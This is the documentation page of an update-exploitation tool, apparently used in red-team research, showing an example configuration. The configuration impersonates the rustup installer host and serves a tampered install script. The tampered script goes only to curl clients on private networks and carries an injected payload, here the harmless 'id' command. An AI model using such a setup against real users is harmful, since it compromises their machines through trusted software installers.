sh4d0wup 0.11.0

Signing-key abuse and update exploitation framework
Documentation 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69

---

upstreams:
  rustup:
    url: https://sh.rustup.rs/

tls:
  names: ["sh.rustup.rs"]

check:
  image: archlinux
  install_certs: ['tee', '-a', '/etc/ssl/certs/ca-certificates.crt']
  register_hosts:
    - sh.rustup.rs
  cmds:
  - "curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs:${SH4D0WUP_BOUND_PORT} | sh -s -- -y"

# these aren't used but it's possible to pre-compute them as a static artifact
artifacts:
  orig:
    type: url
    url: https://sh.rustup.rs
  infect:
    type: infect
    infect: sh
    artifact: orig
    payload: id
    hook_functions: ['downloader']

selectors:
  target:
    type: all
    selectors:
      # only infect local computers
      - type: not
        selector: internet
      # only show the patched version to curl, no browsers
      - type: header
        key: user-agent
        regex: curl

  internet:
    type: all
    selectors:
      - type: not
        selector:
          type: ipaddr
          ipaddr: 10.0.0.0/8
      - type: not
        selector:
          type: ipaddr
          ipaddr: 192.168.0.0/16
      - type: not
        selector:
          type: ipaddr
          ipaddr: 127.0.0.0/8

routes:
  - path: /
    type: patch-shell
    selector: target
    args:
      upstream: rustup
      hook_functions: ['downloader']
      payload: |
        id
  - type: proxy
    args:
      upstream: rustup